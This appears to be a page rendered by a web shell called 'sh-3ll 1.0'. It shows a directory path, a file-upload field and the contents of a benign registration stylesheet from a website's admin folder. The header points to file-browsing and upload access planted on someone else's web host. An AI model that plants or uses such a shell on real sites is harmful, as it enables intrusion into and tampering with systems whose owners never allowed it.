HOME


sh-3ll 1.0
DIR:/chroot/home/laughingplants/laughingplants.com/html/admin/css/
Upload File :
Current File : /chroot/home/laughingplants/laughingplants.com/html/admin/css/registration.css
*
{
font-family: 'Ubuntu', sans-serif;
}


.registration_banner_section
{
   min-height: 700px;
    margin-top: 64px;
    color: #607D8B;
    /* background: linear-gradient(to bottom, #1bceb2 , #125f53); */
    border: 1px solid #547ba2;
    /* box-shadow: 10px 10px 5px #aeb4b9; */
    /* border-radius: 4px; */
    margin-bottom: 75px;
    text-align: center;
    background: url(../images/Signup_image.jpg);
    background-repeat: no-repeat;
    background-size: cover;
    position: relative;
}

.registration_section_1_row_1
{
	text-align: center;
	color: #174c81;
	
}

.input-lg {
    height: 46px;
    padding: 10px 16px;
    font-size: 18px;
    line-height: 1.3333333;
    border-radius: 6px;
}

.submit_primary_button
{
   color: #fff;
    background-color: #547ba2;
    border-color: #f5f5f5;
    padding-left: 35px;
    padding-right: 35px;
    text-align: center;
    /* background: linear-gradient(to bottom, #1bceb2 , #125f53); */
    margin-bottom: 25px;
    font-size: 20px;
}

.login_title_header
{
	background: #31708f;
    min-height: 51px;
    margin-top: -15px;
    color: white;
    /* text-align: center; */
    font-size: 22px;
    font-weight: 600;
    padding-top: 10px;
    padding-left: 16px;
}
.login_default_btn
{
	color: #f5f5f5;
    background-color: #31708f;
    border-color: #31708f;
    padding-left: 36px;
    padding-right: 36px;
}

.registration_banner_section:after {
    content: '\A';
    position: absolute;
    width: 100%; height:100%;
    top:0; left:0;
    background:rgba(0,0,0,0.6);
    opacity: 0;
    transition: all 1s;
    -webkit-transition: all 1s;
}